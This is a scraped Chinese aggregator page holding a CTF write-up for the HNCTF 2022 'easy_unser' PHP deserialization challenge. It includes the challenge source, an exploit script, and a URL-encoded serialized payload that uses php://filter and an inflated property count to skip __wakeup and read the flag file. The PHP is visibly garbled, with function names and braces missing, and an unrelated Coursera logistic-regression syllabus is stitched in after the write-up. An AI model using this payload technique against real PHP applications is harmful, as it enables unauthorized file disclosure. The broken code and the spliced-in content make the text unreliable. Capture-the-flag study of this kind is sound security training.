[HNCTF 2022 WEEK2]

Posted kode00

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[HNCTF 2022 WEEK2]相关的知识,希望对你有一定的参考价值。

easy_unser

 <?php 
    include \'f14g.php\';
    (0);

    (__FILE__);

    class body

    private $want,$todonothing = "i can\'t get you want,But you can tell me before I wake up and change my mind";

    public function  __construct($want)
        $About_me = "When the object is created,I will be called";
        if($want !== " ") $this->want = $want;
        else $this->want = $this->todonothing;
    
    function __wakeup()
        $About_me = "When the object is unserialized,I will be called";
        $but = "I can CHANGE you";
        $this-> want = $but;
        echo "C1ybaby!";
        
    
    function __destruct()
        $About_me = "I\'m the final function,when the object is destroyed,I will be called";
        echo "So,let me see if you can get what you want\\n";
        if($this->todonothing === $this->want)
            die("鲍勃,别傻愣着!\\n");
        if($this->want == "I can CHANGE you")
            die("You are not you....");
        if($this->want == "f14g.php" OR ($this->want))
            die("You want my heart?No way!\\n");
        else
            echo "You got it!";
            ($this->want);
            
    


    class unserializeorder
        public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!<BR>";
        function __sleep()
            $About_me = "When the object is serialized,I will be called";
            echo "We Come To HNCTF,Enjoy the ser14l1zti0n <BR>";
        
        function __toString()
            $About_me = "When the object is used as a string,I will be called";
            return $this->CORE;
        
    
    
    $obj = new unserializeorder();
    echo $obj;
    $obj = ($obj);
    

    if (isset($_GET[\'ywant\']))
    
        $ywant = @(@$_GET[\'ywant\']);
        echo $ywant;
    
?>
人类最大的敌人,就是无序. Yahi param vaastavikta hai!
We Come To HNCTF,Enjoy the ser14l1zti0n 

首先看代码可知,flag在f14g.php中,所以我们只要找到能够利用的点就可以了。

往上看可以看到body类中highlight_file()可以进行利用,所以说我们需要让want为我们想要的f14g.php就可以了。

 function __destruct()
        $About_me = "I\'m the final function,when the object is destroyed,I will be called";
        echo "So,let me see if you can get what you want\\n";
        if($this->todonothing === $this->want)
            die("鲍勃,别傻愣着!\\n");
        if($this->want == "I can CHANGE you")
            die("You are not you....");
        if($this->want == "f14g.php" OR ($this->want))
            die("You want my heart?No way!\\n");
        else
            echo "You got it!";
            ($this->want);
            
     

但是这边过滤的有点严,若是want=f14g.php,或者说是is_file()中的文件存在的话就会返回"So,let me see if you can get what you want\\n";

所以我们不能直接让want=f14g.php,这里可以用php://filter伪协议来回显f14g.php文件。

构造如下:

<?php 

    class body
    private $want="php://filter/resource=f14g.php";
   


    class unserializeorder
        public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!<BR>";
    
$a=new body();

echo (($a));
?>

payload:?ywant=O%3A4%3A"body"%3A2%3As%3A10%3A"%00body%00want"%3Bs%3A30%3A"php%3A%2F%2Ffilter%2Fresource%3Df14g.php"%3B

这里注意还需要绕过__wakeup魔术方法,所以%3A %3A中间原本为1,现在为2。

 

WEEK 3

WEEK 3

Logistic Regression
Logistic regression is a method for classifying data into discrete outcomes. For example, we might use logistic regression to classify an email as spam or not spam. In this module, we introduce the notion of classification, the cost function for logistic regression, and the application of logistic regression to multi-class classification.
7 videos, 8 readings
Video: Classification
Reading: Classification
Video: Hypothesis Representation
Reading: Hypothesis Representation
Video: Decision Boundary
Reading: Decision Boundary
Video: Cost Function
Reading: Cost Function
Video: Simplified Cost Function and Gradient Descent
Reading: Simplified Cost Function and Gradient Descent
Video: Advanced Optimization
Reading: Advanced Optimization
Video: Multiclass Classification: One-vs-all
Reading: Multiclass Classification: One-vs-all
Reading: Lecture Slides
Graded: Logistic Regression
Regularization
Machine learning models need to generalize well to new examples that the model has not seen in practice. In this module, we introduce regularization, which helps prevent models from overfitting the training data.
4 videos, 5 readings
Video: The Problem of Overfitting
Reading: The Problem of Overfitting
Video: Cost Function
Reading: Cost Function
Video: Regularized Linear Regression
Reading: Regularized Linear Regression
Video: Regularized Logistic Regression
Reading: Regularized Logistic Regression
Reading: Lecture Slides
Programming: Logistic Regression
Graded: Regularization

以上是关于[HNCTF 2022 WEEK2]的主要内容,如果未能解决你的问题,请参考以下文章

寒假每日一题2022week2 未完结

hnctf安恒--蜘蛛侠呀

斯坦福-随机图模型-week2.1_

BUUCTF NewStarCTF 公开赛赛道Week2 Writeup

Week2_Introduce_Part1

叶丙成概率课week2